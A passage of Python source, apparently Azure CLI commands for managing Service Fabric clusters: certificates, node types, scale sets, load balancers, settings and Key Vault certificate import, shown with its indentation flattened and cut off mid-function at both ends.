if ext.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or ext.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if fabric_ext is None:
raise CLIError("Failed to find service fabric extension")
import json
seconday_setting = json.loads(
'{{"thumbprint":"{0}","x509StoreName":"{1}"}}'.format(thumbprint, 'my'))
fabric_ext[0].settings["certificateSecondary"] = seconday_setting
_add_cert_to_vmss(vmss, resource_group_name, vault_id, secret_url)
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate.thumbprint_secondary = thumbprint
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_cert(client, resource_group_name, cluster_name, thumbprint):
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to remove certificate")
if cluster.certificate.thumbprint_secondary.lower() == thumbprint.lower():
cluster.certificate.thumbprint_secondary = None
else:
if cluster.certificate.thumbprint.lower() == thumbprint.lower():
cluster.certificate.thumbprint = cluster.certificate.thumbprint_secondary
cluster.certificate.thumbprint_secondary = None
else:
raise CLIError(
"Unable to find the certificate with the thumbprint {} in the cluster".format(thumbprint))
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate = cluster.certificate
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node(client, resource_group_name, cluster_name, node_type, number_of_nodes_to_add):
number_of_nodes_to_add = int(number_of_nodes_to_add)
if number_of_nodes_to_add <= 0:
raise CLIError("--number-of-nodes-to-add must be greater than 0")
compute_client = compute_client_factory()
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type.name)
vmss.sku.capacity = vmss.sku.capacity + number_of_nodes_to_add
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation()(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_node(client, resource_group_name, cluster_name, node_type, number_of_nodes_to_remove):
number_of_nodes_to_remove = int(number_of_nodes_to_remove)
if number_of_nodes_to_remove <= 0:
raise CLIError("--number-of-nodes-to-remove must be greater than 0")
compute_client = compute_client_factory()
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
if node_type.durability_level.lower() == 'bronze':
raise CLIError("Can't delete node if durability level is bronze")
reliability_level = _get_target_instance(cluster.reliability_level)
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type.name)
vmss.sku.capacity = vmss.sku.capacity - number_of_nodes_to_remove
if node_type.is_primary:
if vmss.sku.capacity < reliability_level:
raise CLIError("Can't delete node since current reliability level is {}".format(
reliability_level))
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation()(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_durability(client, resource_group_name, cluster_name, node_type, durability_level):
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
compute_client = compute_client_factory()
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type)
fabric_exts = [ext for ext in vmss.virtual_machine_profile.extension_profile.extensions
if ext.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or ext.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if fabric_exts is None:
raise CLIError("Failed to find service fabric extension")
fabric_ext = fabric_exts[0]
if fabric_ext.settings['durabilityLevel'] == durability_level:
return cluster
fabric_ext.settings['durabilityLevel'] = durability_level
fabric_ext.settings['enableParallelJobs'] = True
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
node_type = node_types[0]
node_type.durability_level = durability_level
patch_request = ClusterUpdateParameters(node_types=node_types)
update_cluster_poll = client.update(
resource_group_name, cluster_name, patch_request)
def wait(poller):
return LongRunningOperation()(poller)
import threading
t1 = threading.Thread(target=wait, args=[vmss_poll])
t2 = threading.Thread(target=wait, args=[update_cluster_poll])
t1.start()
t2.start()
t1.join()
t2.join()
return client.get(resource_group_name, cluster_name)
def update_cluster_upgrade_type(client,
resource_group_name,
cluster_name,
upgrade_mode,
version=None):
if upgrade_mode.lower() != 'manual' and upgrade_mode.lower() != 'automatic':
raise CLIError(
'--upgrade-mode can either be \'manual\' or \'automatic\'')
cluster = client.get(resource_group_name, cluster_name)
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
if upgrade_mode.lower() == 'manual':
if version is None:
raise CLIError(
'When \'--upgrade-mode\' set to \'manual\', --version must be given')
patch_request.cluster_code_version = version
patch_request.upgrade_mode = upgrade_mode
return client.update(resource_group_name, cluster_name, patch_request)
def set_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
value=None,
settings_section_description=None):
def _set(setting_dict, section, parameter, value):
if section not in setting_dict:
setting_dict[section] = {}
setting_dict[section][parameter] = value
return setting_dict
if settings_section_description and (section or parameter or value):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\', \'--parameter\' and \'--value\' to set the settings')
if section or parameter or value:
if section is None or parameter is None or value is None:
raise CLIError(
'\'--section\' , \'--parameter\' and \'--value\' can not be None')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting and 'value' in setting:
setting_dict = _set(setting_dict, setting['section'],
setting['parameter'], setting['value'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _set(setting_dict, section, parameter, value)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
settings_section_description=None):
def _remove(setting_dict, section, parameter):
if section not in setting_dict:
raise CLIError(
"Can't find the section {} in the settings".format(section))
if parameter not in setting_dict[section]:
raise CLIError(
"Can't find the parameter {} in the settings".format(parameter))
del setting_dict[section][parameter]
return setting_dict
if settings_section_description and (section or parameter):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\' and \'--parameter \' to set the settings')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting:
setting_dict = _remove(setting_dict, setting['section'], setting['parameter'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _remove(setting_dict, section, parameter)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_reliability_level(client,
resource_group_name,
cluster_name, reliability_level,
auto_add_node=False):
reliability_level = reliability_level.lower()
cluster = client.get(resource_group_name, cluster_name)
instance_now = _get_target_instance(cluster.reliability_level)
instance_target = _get_target_instance(reliability_level)
node_types = [n for n in cluster.node_types if n.is_primary]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
compute_client = compute_client_factory()
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type.name)
if instance_target == instance_now:
return cluster
if instance_target > instance_now:
if vmss.sku.capacity < instance_target:
if auto_add_node is not True:
raise CLIError('Please use --auto_add_node to automatically increase the nodes,{} requires {} nodes, but currenty there are {}'.
format(reliability_level, instance_target, vmss.sku.capacity))
vmss.sku.capacity = instance_target
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation()(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(
node_types=node_types, reliability_level=reliability_level)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node_type(client,
resource_group_name,
cluster_name,
node_type,
capacity,
vm_user_name,
vm_password,
vm_sku=DEFAULT_SKU,
vm_tier=DEFAULT_TIER,
durability_level=DEFAULT_DURABILITY_LEVEL):
if durability_level.lower() == 'gold':
if vm_sku.lower() != 'Standard_D15_v2' or vm_sku.lower() != 'Standard_G5':
raise CLIError(
'Only Standard_D15_v2 and Standard_G5 supports Gold durability,please specify -VmSku to right value')
cluster = client.get(resource_group_name, cluster_name)
if any(n for n in cluster.node_types if n.name.lower() == node_type):
raise CLIError("{} already exists in the cluster")
cluster.node_types.append(NodeTypeDescription(name=node_type,
client_connection_endpoint_port=DEFAULT_CLIENT_CONNECTION_ENDPOINT,
http_gateway_endpoint_port=DEFAULT_HTTP_GATEWAY_ENDPOINT,
is_primary=False,
vm_instance_count=int(
capacity),
durability_level=durability_level,
application_ports=EndpointRangeDescription(
DEFAULT_APPLICATION_START_PORT, DEFAULT_APPLICATION_END_PORT),
ephemeral_ports=EndpointRangeDescription(DEFAULT_EPHEMERAL_START, DEFAULT_EPHEMERAL_END)))
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
poller = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation()(poller)
subnet_name = "subnet_{}".format(1)
network_client = network_client_factory()
location = _get_resource_group_name(resource_group_name).location
virtual_network = list(
network_client.virtual_networks.list(resource_group_name))[0]
subnets = list(network_client.subnets.list(
resource_group_name, virtual_network.name))
address_prefix = None
index = None
for x in range(1, 255):
address_prefix = '10.0.{}.0/24'.format(x)
index = x
found = False
for s in subnets:
if address_prefix == s.address_prefix:
found = True
if subnet_name.lower() == s.name.lower():
subnet_name = "subnet_{}".format(x)
if found is False:
break
if address_prefix is None:
raise CLIError("Failed to generate the address prefix")
poller = network_client.subnets.create_or_update(resource_group_name,
virtual_network.name,
subnet_name,
Subnet(address_prefix=address_prefix))
subnet = LongRunningOperation()(poller)
public_address_name = 'LBIP-{}-{}{}'.format(
cluster_name.lower(), node_type.lower(), index)
dns_lable = '{}-{}{}'.format(cluster_name.lower(),
node_type.lower(), index)
lb_name = 'LB-{}-{}{}'.format(cluster_name.lower(),
node_type.lower(), index)
poller = network_client.public_ip_addresses.create_or_update(resource_group_name,
public_address_name,
PublicIPAddress(public_ip_allocation_method='Dynamic',
location=location,
dns_settings=PublicIPAddressDnsSettings(dns_lable)))
publicIp = LongRunningOperation()(poller)
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id()
new_load_balancer_id = '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}'.format(
subscription_id, resource_group_name, lb_name)
backend_address_poll_name = "LoadBalancerBEAddressPool"
frontendip_configuration_name = "LoadBalancerIPConfig"
probe_name = "FabricGatewayProbe"
probe_http_name = "FabricHttpGatewayProbe"
inbound_nat_pools_name = "LoadBalancerBEAddressNatPool"
new_load_balancer = LoadBalancer(id=new_load_balancer_id,
location=location,
frontend_ip_configurations=[FrontendIPConfiguration(name=frontendip_configuration_name,
public_ip_address=PublicIPAddress(id=publicIp.id))],
backend_address_pools=[BackendAddressPool(
name=backend_address_poll_name)],
load_balancing_rules=[LoadBalancingRule(name='LBRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.
format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_TCP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_TCP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_name))),
LoadBalancingRule(name='LBHttpRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_HTTP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_HTTP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_http_name)))],
probes=[Probe(protocol='tcp',
name=probe_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_TCP_PORT),
Probe(protocol='tcp',
name=probe_http_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_HTTP_PORT)],
inbound_nat_pools=[InboundNatPool(protocol='tcp',
name=inbound_nat_pools_name,
backend_port=DEFAULT_BACKEND_PORT,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port_range_start=DEFAULT_FRONTEND_PORT_RANGE_START,
frontend_port_range_end=DEFAULT_FRONTEND_PORT_RANGE_END)])
poller = network_client.load_balancers.create_or_update(
resource_group_name, lb_name, new_load_balancer)
LongRunningOperation()(poller)
new_load_balancer = network_client.load_balancers.get(
resource_group_name, lb_name)
backend_address_pools = []
inbound_nat_pools = []
for p in new_load_balancer.backend_address_pools:
backend_address_pools.append(SubResource(id=p.id))
for p in new_load_balancer.inbound_nat_pools:
inbound_nat_pools.append(SubResource(id=p.id))
vm_network_profile = VirtualMachineScaleSetNetworkProfile(network_interface_configurations=[VirtualMachineScaleSetNetworkConfiguration(name='NIC-{}-{}'.format(node_type.lower(), node_type.lower()),
primary=True,
ip_configurations=[VirtualMachineScaleSetIPConfiguration(name='Nic-{}'.format(node_type.lower()),
load_balancer_backend_address_pools=backend_address_pools,
load_balancer_inbound_nat_pools=inbound_nat_pools,
subnet=ApiEntityReference(id=subnet.id))])])
compute_client = compute_client_factory()
vmsses = list(compute_client.virtual_machine_scale_sets.list(
resource_group_name))
vmss = [vm for vm in vmsses
if len([e for e in vm.virtual_machine_profile.extension_profile.extensions if e.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]) > 0]
vmss = vmss[0]
def create_vhd(resource_group_name, cluster_name, node_type, location):
storage_name = '{}{}'.format(cluster_name.lower(), node_type.lower())
name = ""
vhds = []
for n in storage_name:
if n.isalpha() or n.isdigit():
name += n
if len(name) >= 21:
break
for i in range(1, 6):
acc = create_storage_account(
resource_group_name.lower(), '{}{}'.format(storage_name, i), location)
vhds.append('{}{}'.format(acc[0].primary_endpoints.blob, 'vhd'))
return vhds
def create_storage_account(resource_group_name, storage_name, location):
from azure.mgmt.storage.models import Sku, SkuName
storage_client = storage_client_factory()
LongRunningOperation()(storage_client.storage_accounts.create(resource_group_name,
storage_name,
StorageAccountCreateParameters(Sku(SkuName.standard_lrs),
'storage',
location)))
acc_prop = storage_client.storage_accounts.get_properties(
resource_group_name, storage_name)
acc_keys = storage_client.storage_accounts.list_keys(
resource_group_name, storage_name)
return acc_prop, acc_keys
publisher = 'MicrosoftWindowsServer'
offer = 'WindowsServer'
version = 'latest'
sku = os_dic[DEFAULT_OS]
if cluster.vm_image.lower() == 'linux':
publisher = 'Microsoft.Azure.ServiceFabric'
offer = 'UbuntuServer'
version = '6.0.11'
sku = os_dic['UbuntuServer1604']
storage_profile = VirtualMachineScaleSetStorageProfile(image_reference=ImageReference(publisher=publisher,
offer=offer,
sku=sku,
version=version),
os_disk=VirtualMachineScaleSetOSDisk(caching='ReadOnly',
create_option='FromImage',
name='vmssosdisk',
vhd_containers=create_vhd(resource_group_name, cluster_name, node_type, location)))
os_profile = VirtualMachineScaleSetOSProfile(computer_name_prefix=node_type,
admin_password=vm_password,
admin_username=vm_user_name,
secrets=vmss.virtual_machine_profile.os_profile.secrets)
diagnostics_storage_name = cluster.diagnostics_storage_account_config.storage_account_name
diagnostics_ext = None
fabric_ext = None
diagnostics_exts = [e for e in vmss.virtual_machine_profile.extension_profile.extensions if e.type.lower(
) == 'IaaSDiagnostics'.lower()]
if any(diagnostics_exts):
diagnostics_ext = diagnostics_exts[0]
diagnostics_account = diagnostics_ext.settings['StorageAccount']
storage_client = storage_client_factory()
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_account)
import json
json_data = json.loads(
'{"storageAccountName": "", "storageAccountKey": "", "storageAccountEndPoint": ""}')
json_data['storageAccountName'] = diagnostics_account
json_data['storageAccountKey'] = list_results.keys[0].value
json_data['storageAccountEndPoint'] = "https://core.windows.net/"
diagnostics_ext.protected_settings = json_data
fabric_exts = [e for e in vmss.virtual_machine_profile.extension_profile.extensions if e.type.lower(
) == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if any(fabric_exts):
fabric_ext = fabric_exts[0]
if fabric_ext is None:
raise CLIError("No valid fabric extension found")
fabric_ext.settings['nodeTypeRef'] = node_type
fabric_ext.settings['durabilityLevel'] = durability_level
if fabric_ext.settings['nicPrefixOverride']:
fabric_ext.settings['nicPrefixOverride'] = address_prefix
storage_client = storage_client_factory()
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_storage_name)
import json
json_data = json.loads(
'{"StorageAccountKey1": "", "StorageAccountKey2": ""}')
fabric_ext.protected_settings = json_data
fabric_ext.protected_settings['StorageAccountKey1'] = list_results.keys[0].value
fabric_ext.protected_settings['StorageAccountKey2'] = list_results.keys[1].value
extensions = [fabric_ext]
if diagnostics_ext:
extensions.append(diagnostics_ext)
vm_ext_profile = VirtualMachineScaleSetExtensionProfile(
extensions=extensions)
virtual_machine_scale_set_profile = VirtualMachineScaleSetVMProfile(extension_profile=vm_ext_profile,
os_profile=os_profile,
storage_profile=storage_profile,
network_profile=vm_network_profile)
poller = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name,
node_type,
VirtualMachineScaleSet(location=location,
sku=ComputeSku(
vm_sku, vm_tier, capacity),
overprovision=False,
upgrade_policy=UpgradePolicy(
mode=UpgradeMode.automatic),
virtual_machine_profile=virtual_machine_scale_set_profile))
LongRunningOperation()(poller)
return client.get(resource_group_name, cluster_name)
def _verify_cert_function_parameter(certificate_file=None,
certificate_password=None,
vault_name=None, # pylint: disable=unused-argument
vault_resource_group_name=None, # pylint: disable=unused-argument
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
if certificate_file:
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--certificate-file\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--certificate-file\' is present')
else:
if secret_identifier:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if certificate_password:
raise CLIError(
'\'--certificate-password\' is ingored if \'--secret-identifier\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--secret-identifier\' is present')
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--secret-identifier\' is present')
else:
if certificate_subject_name:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if secret_identifier:
raise CLIError(
'\'--secret-identifier\' is ingored if \'--secret-identifier\' is present')
else:
raise CLIError("Invalid input")
def _create_certificate(resource_group_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
_verify_cert_function_parameter(certificate_file, certificate_password,
vault_name, vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
output_file = None
rg = _get_resource_group_name(resource_group_name)
location = rg.location
vault_id = None
secret_url = None
certificate_thumbprint = None
if secret_identifier is not None:
vault = _get_vault_from_secret_identifier(secret_identifier)
vault_id = vault.id
certificate_thumbprint = _get_thumbprint_from_secret_identifier(
vault, secret_identifier)
secret_url = secret_identifier
else:
if certificate_file is not None:
vault_name = _get_vault_name(resource_group_name, vault_name)
logger.info("Creating key vault")
vault = _create_keyvault(
vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(resource_group_name)
logger.info("Import certificate")
result = import_certificate(
vault_uri, certificate_name, certificate_file, password=certificate_password)
vault_id = vault.id
secret_url = result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(result.x509_thumbprint))
else:
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if vault_name is None:
vault_name = resource_group_name
logger.info("Creating key vault")
vault = _create_keyvault(
vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
logger.info("Wait for key vault ready")
time.sleep(20)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(resource_group_name)
policy = _get_default_policy(certificate_subject_name)
logger.info("Creating self-signed certificate")
result = _create_self_signed_key_vault_certificate(
vault_uri, certificate_name, policy, certificate_output_folder=certificate_output_folder)
kv_result = result[0]
output_file = result[1]
vault_id = vault.id
secret_url = kv_result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(kv_result.x509_thumbprint))
return vault_id, secret_url, certificate_thumbprint, output_file
def _add_cert_to_vmss(vmss, resource_group_name, vault_id, secret_url):
compute_client = compute_client_factory()
secrets = [
s for s in vmss.virtual_machine_profile.os_profile.secrets if s.source_vault.id == vault_id]
if secrets is not None:
if secrets[0].vault_certificates is not None:
certs = [
c for c in secrets[0].vault_certificates if c.certificate_url == secret_url]
if certs is None:
secrets[0].vault_certificates.append(
VaultCertificate(secret_url, 'my'))
else:
return
else:
secrets[0].vault_certificates = []
secrets[0].vault_certificates.append(
VaultCertificate(secret_url, 'my'))
else:
vmss.virtual_machine_profile.os_profile.secrets = []
new_vault_certificates = []
new_vault_certificates.append(VaultCertificate(secret_url, 'my'))
vmss.virtual_machine_profile.os_profile.secrets.append(VaultSecretGroup(SubResource(vault_id),
new_vault_certificates))
poller = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
return LongRunningOperation()(poller)
def _add_cert_to_all_vmss(resource_group_name, vault_id, secret_url):
threads = []
import threading
compute_client = compute_client_factory()
vmsses = list(compute_client.virtual_machine_scale_sets.list(
resource_group_name))
if vmsses is not None:
for vmss in vmsses:
t = threading.Thread(target=_add_cert_to_vmss, args=[vmss, resource_group_name, vault_id, secret_url])
t.start()
threads.append(t)
for t in threads:
t.join()
def _get_resource_group_name(resource_group_name):
try:
resouce_client = resource_client_factory().resource_groups
return resouce_client.get(resource_group_name)
except Exception as ex: # pylint: disable=broad-except
error = getattr(ex, 'Azure Error', ex)
if error != 'ResourceGroupNotFound':
return None
else:
raise
def _create_resource_group_name(rg_name, location, tags=None):
from azure.mgmt.resource.resources.models import ResourceGroup
client = resource_client_factory().resource_groups
parameters = ResourceGroup(location=location, tags=tags)
client.create_or_update(rg_name, parameters)
def _get_target_instance(reliability_level):
level = reliability_level.lower()
if level == 'none':
return 1
if level == 'bronze':
return 3
if level == 'silver':
return 5
if level == 'gold':
return 7
if level == 'platinum':
return 9
def _get_reliability_level(cluster_size):
size = int(cluster_size)
if size > 0 and size < 3:
return 'None'
if size >= 3 and size < 5:
return 'Bronze'
if size >= 5 and size < 7:
return 'Silver'
if size >= 7 and size < 9:
return 'Gold'
if size >= 9:
return 'Platinum'
def _fabric_settings_to_dict(fabric_settings):
d = {}
if fabric_settings:
for s1 in fabric_settings:
section_name = s1.name
if section_name not in d:
d[section_name] = {}
if s1.parameters:
for s2 in s1.parameters:
parameter_name = s2.name
d[section_name][parameter_name] = s2.value
return d
def _dict_to_fabric_settings(setting_dict):
settings = []
if setting_dict and any(setting_dict):
for k, v in setting_dict.items():
parameters = []
setting_des = SettingsSectionDescription(k, parameters)
for kk, vv in v.items():
setting_des.parameters.append(
SettingsParameterDescription(kk, vv))
if setting_des.parameters and any(setting_des.parameters):
settings.append(setting_des)
return settings
def _deploy_arm_template_core(resource_group_name,
template,
parameters,
deployment_name=None,
mode='incremental',
validate_only=False,
no_wait=False):
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(
template=template, template_link=None, parameters=parameters, mode=mode)
client = resource_client_factory()
if validate_only:
return client.deployments.validate(resource_group_name, deployment_name, properties, raw=no_wait)
deploy_poll = client.deployments.create_or_update(resource_group_name, deployment_name, properties, raw=no_wait)
result = LongRunningOperation()(deploy_poll)
return result
def _get_vault_name(resource_group_name, vault_name):
if not vault_name:
return resource_group_name
return vault_name
# pylint: disable=unused-argument
def _get_certificate_name(resource_group_name):
certificate_name = resource_group_name
name = ""
for n in certificate_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
certificate_name = name
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
return "{}{}".format(certificate_name, suffix)
def _get_vault_from_secret_identifier(secret_identifier):
key_vault_client = keyvault_client_factory().vaults
vault_name = urlparse(secret_identifier).hostname.split('.')[0]
vaults = key_vault_client.list()
if vaults is not None:
vault = [v for v in vaults if v.name == vault_name]
return vault[0]
def _get_vault_uri_and_resource_group_name(vault):
client = keyvault_client_factory().vaults
vault_resource_group_name = vault.id.split('/')[4]
v = client.get(vault_resource_group_name, vault.name)
vault_uri = v.properties.vault_uri
return vault_uri, vault_resource_group_name
def _asn1_to_iso8601(asn1_date):
import dateutil.parser
if isinstance(asn1_date, bytes):
asn1_date = asn1_date.decode('utf-8')
return dateutil.parser.parse(asn1_date)
def _get_thumbprint_from_secret_identifier(vault, secret_identifier):
secret_uri = urlparse(secret_identifier)
path = secret_uri.path
segment = path.split('/')
secret_name = segment[2]
secret_version = segment[3]
vault_uri_group = _get_vault_uri_and_resource_group_name(vault)
vault_uri = vault_uri_group[0]
client_not_arm = _get_keyVault_not_arm_client()
secret = client_not_arm.get_secret(vault_uri, secret_name, secret_version)
cert_bytes = secret.value
x509 = None
import base64
decoded = base64.b64decode(cert_bytes)
try:
x509 = crypto.load_pkcs12(decoded).get_certificate()
except (ValueError, crypto.Error):
pass
if not x509:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
if not x509:
raise Exception('invalid certificate')
thumbprint = x509.digest("sha1").decode("utf-8").replace(':', '')
return thumbprint
def _get_certificate(client, vault_base_url, certificate_name):
""" Download a certificate from a KeyVault. """
cert = client.get_certificate(vault_base_url, certificate_name, '')
return cert
def import_certificate(vault_base_url, certificate_name, certificate_data,
disabled=False, password=None, certificate_policy=None, tags=None):
import binascii
certificate_data = open(certificate_data, 'rb').read()
x509 = None
content_type = None
try:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_data)
# if we get here, we know it was a PEM file
content_type = 'application/x-pem-file'
try:
# for PEM files (including automatic endline conversion for
# Windows)
certificate_data = certificate_data.decode(
'utf-8').replace('\r\n', '\n')
except UnicodeDecodeError:
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except (ValueError, crypto.Error):
pass
if not x509:
try:
if password:
x509 = crypto.load_pkcs12(
certificate_data, password).get_certificate()
else:
x509 = crypto.load_pkcs12(certificate_data).get_certificate()
content_type = 'application/x-pkcs12'
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except crypto.Error:
raise CLIError(
'We could not parse the provided certificate as .pem or .pfx. Please verify the certificate with OpenSSL.') # pylint: disable=line-too-long
not_before, not_after = None, None
if x509.get_notBefore():
not_before = _asn1_to_iso8601(x509.get_notBefore())
if x509.get_notAfter():
not_after = _asn1_to_iso8601(x509.get_notAfter())
cert_attrs = CertificateAttributes(enabled=not disabled,
not_before=not_before,
expires=not_after)
if certificate_policy:
secret_props = certificate_policy.get('secret_properties')
if secret_props:
secret_props['content_type'] = content_type
elif certificate_policy and not secret_props:
certificate_policy['secret_properties'] = SecretProperties(
content_type=content_type)
else:
certificate_policy = CertificatePolicy(
secret_properties=SecretProperties(content_type=content_type))
logger.info("Starting 'keyvault certificate import'")
client_not_arm = _get_keyVault_not_arm_client()
result = client_not_arm.import_certificate(vault_base_url=vault_base_url,
certificate_name=certificate_name,
base64_encoded_certificate=certificate_data,
certificate_attributes=cert_attrs,
certificate_policy=certificate_policy,
tags=tags,
password=password)
logger.info("Finished 'keyvault certificate import'")
return result
def _download_secret(vault_base_url, secret_name, pem_path, pfx_path, encoding=None, secret_version=''): # pylint: disable=unused-argument
client = _get_keyVault_not_arm_client()
secret = client.get_secret(vault_base_url, secret_name, secret_version)
secret_value = secret.value
if pem_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
f_pem = open(pem_path, 'wb')
f_pem.write(crypto.dump_privatekey(
crypto.FILETYPE_PEM, p12.get_privatekey()))
f_pem.write(crypto.dump_certificate(
